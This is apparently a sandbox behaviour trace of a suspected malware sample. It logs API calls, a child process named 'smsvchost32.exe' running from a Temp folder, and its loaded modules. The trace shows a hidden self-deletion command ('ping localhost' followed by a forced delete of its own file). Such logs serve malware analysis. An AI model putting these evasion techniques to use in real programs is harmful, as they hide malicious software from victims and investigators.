	[0087.552] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x263f4bc, nSize=0x104 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\tmp8c77.tmp")) returned 0x30
	[0087.552] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x263eea4, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.552] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.553] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] GetLastError () returned 0x0
	[0087.554] lstrcpyW (in: lpString1=0x263f0ac, lpString2="/c ping localhost -n 4 & del /F /Q \"" | out: lpString1="/c ping localhost -n 4 & del /F /Q \"") returned="/c ping localhost -n 4 & del /F /Q \""
	[0087.555] lstrcatW (in: lpString1="/c ping localhost -n 4 & del /F /Q \"", lpString2="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp" | out: lpString1="/c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp") returned="/c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp"
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] lstrcatW (in: lpString1="/c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp", lpString2="\" > nul" | out: lpString1="/c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" > nul") returned="/c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" > nul"
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetLastError () returned 0x0
	[0087.555] GetCurrentProcess () returned 0xffffffff
	[0087.555] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x100) returned 1
	[0087.556] GetCurrentThread () returned 0xfffffffe
	[0087.556] SetThreadPriority (hThread=0xfffffffe, nPriority=15) returned 1
	[0087.556] CoInitializeEx (pvReserved=0x0, dwCoInit=0x6) returned 0x0
	[0087.646] ShellExecuteExW (in: pExecInfo=0x263f6c4*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="open", lpFile="C:\\Windows\\system32\\cmd.exe", lpParameters="/c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" > nul", lpDirectory=0x0, nShow=0, hInstApp=0x779eabfa, lpIDList=0x4, lpClass="\xcf60\x774e\xc130\x7757\x01", hkeyClass=0x779eace9, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x263f6c4*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="open", lpFile="C:\\Windows\\system32\\cmd.exe", lpParameters="/c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" > nul", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x4, lpClass="\xcf60\x774e\xc130\x7757\x01", hkeyClass=0x779eace9, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3a4)) returned 1
	[0087.870] SetPriorityClass (hProcess=0x3a4, dwPriorityClass=0x40) returned 1
	[0087.870] SetProcessPriorityBoost (hProcess=0x3a4, bDisablePriorityBoost=1) returned 1
	[0087.870] SHChangeNotify (wEventId=4, uFlags=0x5, dwItem1=0x263f4bc, dwItem2=0x0) 
	[0087.875] ExitProcess (uExitCode=0x0) 

Thread:
	id = 91
	os_tid = 0x678


Thread:
	id = 92
	os_tid = 0x83c


Thread:
	id = 93
	os_tid = 0xf04


Thread:
	id = 94
	os_tid = 0x838


Thread:
	id = 95
	os_tid = 0xac8


Thread:
	id = 96
	os_tid = 0xad4


Process:
	id = "10"
	image_name = "smsvchost32.exe"
	filename = "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"
	page_root = "0x5919e000"
	os_pid = "0x934"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "9"
	os_parent_pid = "0xe6c"
	cmd_line = "C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1677
	        start_va = 0x10000
	          end_va = 0x2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1678
	        start_va = 0x30000
	          end_va = 0x31fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 1679
	        start_va = 0x40000
	          end_va = 0x54fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000040000"
	        filename = ""

Region:
	              id = 1680
	        start_va = 0x60000
	          end_va = 0x9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000060000"
	        filename = ""

Region:
	              id = 1681
	        start_va = 0xa0000
	          end_va = 0x19ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000a0000"
	        filename = ""

Region:
	              id = 1682
	        start_va = 0x1a0000
	          end_va = 0x1a3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 1683
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 1684
	        start_va = 0x200000
	          end_va = 0x3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1685
	        start_va = 0x400000
	          end_va = 0x43efff
	     entry_point = 0x400000
	     region_type = mapped_file
	            name = "smsvchost32.exe"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")

Region:
	              id = 1686
	        start_va = 0x77960000
	          end_va = 0x77adafff
	     entry_point = 0x77960000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1687
	        start_va = 0x7ffb0000
	          end_va = 0x7ffd2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ffb0000"
	        filename = ""

Region:
	              id = 1688
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1689
	        start_va = 0x7fff0000
	          end_va = 0x7ffc1562ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1690
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1691
	        start_va = 0x7ffc157f1000
	          end_va = 0x7ffffffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffc157f1000"
	        filename = ""

Region:
	              id = 1694
	        start_va = 0x580000
	          end_va = 0x58ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000580000"
	        filename = ""

Region:
	              id = 1695
	        start_va = 0x55c00000
	          end_va = 0x55c79fff
	     entry_point = 0x55c00000
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1696
	        start_va = 0x55c90000
	          end_va = 0x55cdffff
	     entry_point = 0x55c90000
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1697
	        start_va = 0x55c80000
	          end_va = 0x55c87fff
	     entry_point = 0x55c80000
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1698
	        start_va = 0x10000
	          end_va = 0x1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1699
	        start_va = 0x20000
	          end_va = 0x23fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1700
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1701
	        start_va = 0x440000
	          end_va = 0x4fdfff
	     entry_point = 0x440000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1702
	        start_va = 0x640000
	          end_va = 0x73ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000640000"
	        filename = ""

Region:
	              id = 1703
	        start_va = 0x740000
	          end_va = 0x83ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000740000"
	        filename = ""

Region:
	              id = 1704
	        start_va = 0x6fce0000
	          end_va = 0x6fcfbfff
	     entry_point = 0x6fce0000
	     region_type = mapped_file
	            name = "ntdsapi.dll"
	        filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll")

Region:
	              id = 1705
	        start_va = 0x6fd00000
	          end_va = 0x6fd17fff
	     entry_point = 0x6fd00000
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 1706
	        start_va = 0x6fd20000
	          end_va = 0x6fd45fff
	     entry_point = 0x6fd20000
	     region_type = mapped_file
	            name = "odbctrac.dll"
	        filename = "\\Windows\\SysWOW64\\odbctrac.dll" (normalized: "c:\\windows\\syswow64\\odbctrac.dll")

Region:
	              id = 1707
	        start_va = 0x6fd50000
	          end_va = 0x6fd76fff
	     entry_point = 0x6fd50000
	     region_type = mapped_file
	            name = "dsprop.dll"
	        filename = "\\Windows\\SysWOW64\\dsprop.dll" (normalized: "c:\\windows\\syswow64\\dsprop.dll")

Region:
	              id = 1708
	        start_va = 0x6ffa0000
	          end_va = 0x6ffe9fff
	     entry_point = 0x6ffa0000
	     region_type = mapped_file
	            name = "eappcfg.dll"
	        filename = "\\Windows\\SysWOW64\\eappcfg.dll" (normalized: "c:\\windows\\syswow64\\eappcfg.dll")

Region:
	              id = 1709
	        start_va = 0x74680000
	          end_va = 0x74689fff
	     entry_point = 0x74680000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1710
	        start_va = 0x74690000
	          end_va = 0x746adfff
	     entry_point = 0x74690000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1711
	        start_va = 0x746c0000
	          end_va = 0x7471efff
	     entry_point = 0x746c0000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1712
	        start_va = 0x74720000
	          end_va = 0x74763fff
	     entry_point = 0x74720000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1713
	        start_va = 0x747c0000
	          end_va = 0x7487dfff
	     entry_point = 0x747c0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1714
	        start_va = 0x74880000
	          end_va = 0x74a3cfff
	     entry_point = 0x74880000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1715
	        start_va = 0x74aa0000
	          end_va = 0x74b1afff
	     entry_point = 0x74aa0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1716
	        start_va = 0x74b20000
	          end_va = 0x74b64fff
	     entry_point = 0x74b20000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1717
	        start_va = 0x74b70000
	          end_va = 0x75068fff
	     entry_point = 0x74b70000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")

Region:
	              id = 1718
	        start_va = 0x75070000
	          end_va = 0x7511cfff
	     entry_point = 0x75070000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1719
	        start_va = 0x75120000
	          end_va = 0x7651efff
	     entry_point = 0x75120000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")

Region:
	              id = 1720
	        start_va = 0x765a0000
	          end_va = 0x7667ffff
	     entry_point = 0x765a0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1721
	        start_va = 0x76ec0000
	          end_va = 0x76ef6fff
	     entry_point = 0x76ec0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")

Region:
	              id = 1722
	        start_va = 0x76f00000
	          end_va = 0x7704efff
	     entry_point = 0x76f00000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1723
	        start_va = 0x773a0000
	          end_va = 0x773f7fff
	     entry_point = 0x773a0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1724
	        start_va = 0x774c0000
	          end_va = 0x7763dfff
	     entry_point = 0x774c0000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1725
	        start_va = 0x77760000
	          end_va = 0x7776bfff
	     entry_point = 0x77760000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 1726
	        start_va = 0x77810000
	          end_va = 0x77956fff
	     entry_point = 0x77810000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1727
	        start_va = 0x7feb0000
	          end_va = 0x7ffaffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007feb0000"
	        filename = ""

Region:
	              id = 1735
	        start_va = 0x30000
	          end_va = 0x30fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 1736
	        start_va = 0x500000
	          end_va = 0x500fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 1737
	        start_va = 0x520000
	          end_va = 0x52ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000520000"
	        filename = ""

Region:
	              id = 1738
	        start_va = 0x840000
	          end_va = 0x9c7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000840000"
	        filename = ""

Region:
	              id = 1739
	        start_va = 0x9d0000
	          end_va = 0xb50fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000009d0000"
	        filename = ""

Region:
	              id = 1740
	        start_va = 0xb60000
	          end_va = 0x1f5ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000b60000"
	        filename = ""

Region:
	              id = 1741
	        start_va = 0x6fa40000
	          end_va = 0x6fa55fff
	     entry_point = 0x6fa40000
	     region_type = mapped_file
	            name = "mpr.dll"
	        filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll")

Region:
	              id = 1742
	        start_va = 0x6fa60000
	          end_va = 0x6faf1fff
	     entry_point = 0x6fa60000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")

Region:
	              id = 1743
	        start_va = 0x6fb00000
	          end_va = 0x6fb37fff
	     entry_point = 0x6fb00000
	     region_type = mapped_file
	            name = "adsldpc.dll"
	        filename = "\\Windows\\SysWOW64\\adsldpc.dll" (normalized: "c:\\windows\\syswow64\\adsldpc.dll")

Region:
	              id = 1744
	        start_va = 0x6fb40000
	          end_va = 0x6fbd8fff
	     entry_point = 0x6fb40000
	     region_type = mapped_file
	            name = "odbc32.dll"
	        filename = "\\Windows\\SysWOW64\\odbc32.dll" (normalized: "c:\\windows\\syswow64\\odbc32.dll")

Region:
	              id = 1745
	        start_va = 0x6fbe0000
	          end_va = 0x6fbe7fff
	     entry_point = 0x6fbe0000
	     region_type = mapped_file
	            name = "dsrole.dll"
	        filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll")

Region:
	              id = 1746
	        start_va = 0x6fbf0000
	          end_va = 0x6fc98fff
	     entry_point = 0x6fbf0000
	     region_type = mapped_file
	            name = "dsuiext.dll"
	        filename = "\\Windows\\SysWOW64\\dsuiext.dll" (normalized: "c:\\windows\\syswow64\\dsuiext.dll")

Region:
	              id = 1747
	        start_va = 0x6fca0000
	          end_va = 0x6fcdafff
	     entry_point = 0x6fca0000
	     region_type = mapped_file
	            name = "activeds.dll"
	        filename = "\\Windows\\SysWOW64\\activeds.dll" (normalized: "c:\\windows\\syswow64\\activeds.dll")

Region:
	              id = 1748
	        start_va = 0x6ff90000
	          end_va = 0x6ff99fff
	     entry_point = 0x6ff90000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll")

Region:
	              id = 1749
	        start_va = 0x70090000
	          end_va = 0x70097fff
	     entry_point = 0x70090000
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll")

Region:
	              id = 1750
	        start_va = 0x71d30000
	          end_va = 0x71d5efff
	     entry_point = 0x71d30000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")

Region:
	              id = 1751
	        start_va = 0x72190000
	          end_va = 0x721befff
	     entry_point = 0x72190000
	     region_type = mapped_file
	            name = "logoncli.dll"
	        filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll")

Region:
	              id = 1752
	        start_va = 0x74770000
	          end_va = 0x747b3fff
	     entry_point = 0x74770000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")

Region:
	              id = 1753
	        start_va = 0x76680000
	          end_va = 0x766d2fff
	     entry_point = 0x76680000
	     region_type = mapped_file
	            name = "wldap32.dll"
	        filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")

Region:
	              id = 1754
	        start_va = 0x766e0000
	          end_va = 0x766eefff
	     entry_point = 0x766e0000
	     region_type = mapped_file
	            name = "profapi.dll"
